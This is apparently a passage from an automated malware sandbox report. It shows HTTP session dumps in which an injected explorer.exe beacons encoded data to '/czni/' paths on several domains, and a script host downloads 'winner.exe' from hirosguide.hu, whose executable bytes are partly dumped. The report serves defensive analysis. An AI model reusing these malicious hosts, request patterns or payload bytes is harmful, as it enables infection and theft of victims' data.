                                                                          Data Ascii: vOuZlu2gw387VDV10PDpiWTFl2xG2mj37j5EK3EACa1yxM1cLCbJZ7QUgC2jLM%2FTg8TnJqujzMrtpKg%2FUGeVYytsfF%2FXPvWg%3D%3D">Click here to proceed</a>.</body></noframes></html>...*/-->
                                                                          Jan 30, 2023 13:40:12.425951004 CET776INData Raw: 76 4f 75 5a 6c 75 32 67 77 33 38 37 56 44 56 31 30 50 44 70 69 57 54 46 6c 32 78 47 32 6d 6a 33 37 6a 35 45 4b 33 45 41 43 61 31 79 78 4d 31 63 4c 43 62 4a 5a 37 51 55 67 43 32 6a 4c 4d 25 32 46 54 67 38 54 6e 4a 71 75 6a 7a 4d 72 74 70 4b 67 25
                                                                          Data Ascii: vOuZlu2gw387VDV10PDpiWTFl2xG2mj37j5EK3EACa1yxM1cLCbJZ7QUgC2jLM%2FTg8TnJqujzMrtpKg%2FUGeVYytsfF%2FXPvWg%3D%3D">Click here to proceed</a>.</body></noframes></html>...*/-->


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          6192.168.2.54971466.96.162.14980C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:40:19.048485994 CET784OUTPOST /czni/ HTTP/1.1
                                                                          Host: www.genuineinsights.cloud
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.genuineinsights.cloud
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.genuineinsights.cloud/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Raw: 7a 38 72 75 6c 2d 6e 3d 35 34 49 6f 58 33 46 77 65 4d 6d 63 65 66 47 35 74 67 49 49 67 53 32 37 46 30 65 65 36 2d 79 5a 55 4a 43 37 4e 67 49 5a 4f 57 45 37 38 5a 79 79 50 51 64 64 33 38 65 50 50 73 69 6a 38 50 51 65 74 61 31 6c 77 67 7e 57 67 32 78 34 54 6d 63 4b 59 6c 34 72 50 6f 61 73 34 59 59 65 66 33 52 51 39 37 4e 4e 75 6d 52 53 64 79 32 63 39 61 67 71 54 49 45 5f 54 6b 66 68 77 76 34 37 43 65 42 34 4d 49 37 52 50 78 76 72 5a 59 77 68 6e 62 56 5f 51 6b 50 54 35 4e 38 44 57 38 47 46 6d 76 6a 77 73 66 63 71 70 2d 50 48 61 46 5a 37 63 7a 48 58 48 51 29 2e 00 00 00 00 00 00 00 00
                                                                          Data Ascii: z8rul-n=54IoX3FweMmcefG5tgIIgS27F0ee6-yZUJC7NgIZOWE78ZyyPQdd38ePPsij8PQeta1lwg~Wg2x4TmcKYl4rPoas4YYef3RQ97NNumRSdy2c9agqTIE_Tkfhwv47CeB4MI7RPxvrZYwhnbV_QkPT5N8DW8GFmvjwsfcqp-PHaFZ7czHXHQ).
                                                                          Jan 30, 2023 13:40:19.462457895 CET786INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:40:19 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 867
                                                                          Connection: close
                                                                          Server: Apache/2
                                                                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                          Accept-Ranges: bytes
                                                                          Age: 0
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          7192.168.2.54971566.96.162.14980C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:40:21.675069094 CET786OUTGET /czni/?z8rul-n=06gIUCFIBOa1TNKOgihx1QaHEyCsoo2zVarqfXE1BGhN6bynIxp2kNvfG92v3asKvvgl0gKrl2tBRyImUhoMMpO0yMdYVRtJxA==&20=4xfPiv3RnE HTTP/1.1
                                                                          Host: www.genuineinsights.cloud
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:40:23.543339968 CET788INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:40:23 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 867
                                                                          Connection: close
                                                                          Server: Apache/2
                                                                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                          Accept-Ranges: bytes
                                                                          Age: 0
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          8192.168.2.549716137.59.148.24880C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:40:29.928004980 CET789OUTPOST /czni/ HTTP/1.1
                                                                          Host: www.44yyds.com
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.44yyds.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.44yyds.com/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Raw: 7a 38 72 75 6c 2d 6e 3d 4f 42 66 72 49 52 31 4f 30 52 70 77 78 7a 48 42 7a 51 74 6c 4a 49 6f 7a 68 6d 6d 35 32 31 72 46 74 59 74 52 4e 62 67 77 6a 38 6d 43 59 4e 30 42 4e 37 38 6d 6a 77 34 71 65 66 4c 7a 71 6d 39 6f 64 42 59 57 68 50 69 30 68 49 45 6b 4a 4d 7a 74 35 4b 74 42 4d 57 79 6d 4b 64 45 6c 39 44 30 66 62 46 37 4b 67 70 43 71 35 33 72 58 7a 61 58 4d 45 49 6a 52 7e 59 74 62 72 42 45 68 73 68 69 56 4c 68 38 42 45 52 6b 68 45 37 75 77 75 79 34 47 38 41 43 6c 4a 72 36 37 46 48 73 79 5a 67 36 7a 33 43 71 50 68 7a 66 65 4d 58 6f 50 58 44 48 6c 49 41 29 2e 00 00 00 00 00 00 00 00
                                                                          Data Ascii: z8rul-n=OBfrIR1O0RpwxzHBzQtlJIozhmm521rFtYtRNbgwj8mCYN0BN78mjw4qefLzqm9odBYWhPi0hIEkJMzt5KtBMWymKdEl9D0fbF7KgpCq53rXzaXMEIjR~YtbrBEhshiVLh8BERkhE7uwuy4G8AClJr67FHsyZg6z3CqPhzfeMXoPXDHlIA).
                                                                          Jan 30, 2023 13:40:30.151243925 CET790INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:40:30 GMT
                                                                          Server: Apache
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Last-Modified: Fri, 18 Feb 2022 06:24:03 GMT
                                                                          Accept-Ranges: bytes
                                                                          Vary: Accept-Encoding
                                                                          Content-Encoding: gzip
                                                                          Content-Length: 358
                                                                          Content-Type: text/html
                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 5d 17 eb 38 6d 60 1f e1 77 ff e7 0b 63 0d 17 d5 47 02 00 00
                                                                          Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          9192.168.2.549717137.59.148.24880C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:40:34.488315105 CET790OUTGET /czni/?20=4xfPiv3RnE&z8rul-n=DD3LLnJbgjRI3wbnkxRSCI8A3gaHykSHoexTe78K7+O1bJpnCKZS4RFcfu7PoQdaWmtTlOOE5dVeManAz6l5Ezu0dt1GwRw+Ew== HTTP/1.1
                                                                          Host: www.44yyds.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:40:34.709826946 CET791INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:40:34 GMT
                                                                          Server: Apache
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Last-Modified: Fri, 18 Feb 2022 06:24:03 GMT
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 583
                                                                          Vary: Accept-Encoding
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.54970391.227.138.48443C:\Windows\System32\wscript.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-01-30 12:39:17 UTC0OUTGET /ti/winner.exe HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-us
                                                                          UA-CPU: AMD64
                                                                          Accept-Encoding: gzip, deflate
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                          Host: hirosguide.hu
                                                                          Connection: Keep-Alive
                                                                          2023-01-30 12:39:17 UTC0INHTTP/1.1 200 OK
                                                                          Date: Mon, 30 Jan 2023 12:39:17 GMT
                                                                          Server: Apache
                                                                          Last-Modified: Mon, 30 Jan 2023 01:30:14 GMT
                                                                          ETag: "1f83c43-97200-5f37128270b27"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 619008
                                                                          Connection: close
                                                                          Content-Type: application/x-msdownload
                                                                          2023-01-30 12:39:17 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 29 7c 66 d8 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 4e 09 00 00 20 00 00 00 00 00 00 8e 6c 09 00 00 20 00 00 00 80 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL)|fN l @ @
                                                                          2023-01-30 12:39:17 UTC8INData Raw: 0e 35 00 38 77 34 00 00 39 38 0a 00 00 fe 0c 13 00 20 0b 00 00 00 20 6f 00 00 00 20 63 00 00 00 58 9c 20 61 01 00 00 fe 0e 35 00 38 15 0a 00 00 20 5a 00 00 00 20 3a 00 00 00 58 fe 0e 16 00 20 54 01 00 00 38 f8 09 00 00 fe 0c 08 00 20 02 00 00 00 fe 0c 16 00 9c 20 a4 01 00 00 fe 0e 35 00 38 24 34 00 00 39 cf 00 00 00 38 d6 09 00 00 fe 0c 13 00 20 07 00 00 00 20 9d 00 00 00 20 44 00 00 00 58 9c 20 99 00 00 00 38 b3 09 00 00 20 71 00 00 00 20 28 00 00 00 58 fe 0e 16 00 20 fc 00 00 00 fe 0e 35 00 38 9a 09 00 00 fe 0c 08 00 20 19 00 00 00 fe 0c 03 00 9c 20 9e 00 00 00 38 7e 09 00 00 11 01 11 31 11 2b 38 c5 33 00 00 13 2d 20 11 00 00 00 38 6f 09 00 00 20 51 00 00 00 20 14 00 00 00 58 fe 0e 16 00 20 7b 00 00 00 38 4e 09 00 00 fe 0c 08 00 20 08 00 00 00 fe 0c 16
                                                                          Data Ascii: 58w498 o cX a58 Z :X T8 58$498 DX 8 q (X 58 8~1+83- 8o Q X {8N
                                                                          2023-01-30 12:39:17 UTC16INData Raw: 00 00 fe 0e 35 00 38 fa ea ff ff 38 ae de ff ff 11 2c 11 07 5d 13 2e 20 80 00 00 00 38 e8 ea ff ff fe 0c 08 00 20 04 00 00 00 fe 0c 16 00 9c 20 ab 01 00 00 fe 0e 35 00 38 42 16 00 00 3a c3 ea ff ff 02 15 40 29 f7 ff ff 20 74 00 00 00 38 ae ea ff ff 11 04 8e 69 16 3e 69 04 00 00 20 5e 01 00 00 38 9a ea ff ff fe 0c 13 00 20 07 00 00 00 fe 0c 0c 00 9c 20 62 01 00 00 fe 0e 35 00 38 82 ea ff ff 20 ac 00 00 00 20 39 00 00 00 59 fe 0e 16 00 20 96 00 00 00 38 65 ea ff ff fe 0c 08 00 20 04 00 00 00 20 08 00 00 00 20 4e 00 00 00 58 9c 20 83 00 00 00 38 46 ea ff ff 11 00 11 0f 19 58 11 0a 20 00 00 00 ff 5f 1f 18 64 d2 9c 20 8c 00 00 00 38 29 ea ff ff 20 f6 00 00 00 20 52 00 00 00 59 fe 0e 03 00 20 e6 00 00 00 fe 0e 35 00 38 10 ea ff ff 20 93 00 00 00 20 31 00 00 00
                                                                          Data Ascii: 588,]. 8 58B:@) t8i>i ^8 b58 9Y 8e NX 8FX _d 8) RY 58 1
                                                                          2023-01-30 12:39:17 UTC23INData Raw: 2a 00 00 00 92 2b 09 28 a9 31 1c 30 14 16 9a 26 16 2d f9 fe 09 00 00 fe 09 01 00 fe 09 02 00 fe 09 03 00 6f 55 00 00 0a 2a 00 00 00 62 2b 09 28 5b 1d 09 38 14 16 9a 26 16 2d f9 fe 09 00 00 6f 61 00 00 0a 2a 00 00 00 62 2b 09 28 80 e5 3a 44 14 16 9a 26 16 2d f9 fe 09 00 00 6f 57 00 00 0a 2a 00 00 00 62 2b 09 28 4b 6c 26 51 14 16 9a 26 16 2d f9 fe 09 00 00 6f 56 00 00 0a 2a 00 00 00 76 2b 09 28 ba 3d 5a 54 14 16 9a 26 16 2d f9 00 fe 09 00 00 fe 09 01 00 28 21 00 00 0a 2a 00 00 56 2b 09 28 a7 fb 0b 56 14 16 9a 26 16 2d f9 00 28 42 00 00 0a 2a 00 00 92 2b 09 28 5b a5 43 69 14 16 9a 26 16 2d f9 fe 09 00 00 fe 09 01 00 fe 09 02 00 fe 09 03 00 6f 43 00 00 0a 2a 00 00 00 42 2b 09 28 1f 67 26 67 14 16 9a 26 16 2d f9 17 2a 00 00 00 42 2b 09 28 ad d1 03 64 14 16 9a
                                                                          Data Ascii: *+(10&-oU*b+([8&-oa*b+(:D&-oW*b+(Kl&Q&-oV*v+(=ZT&-(!*V+(V&-(B*+([Ci&-oC*B+(g&g&-*B+(d
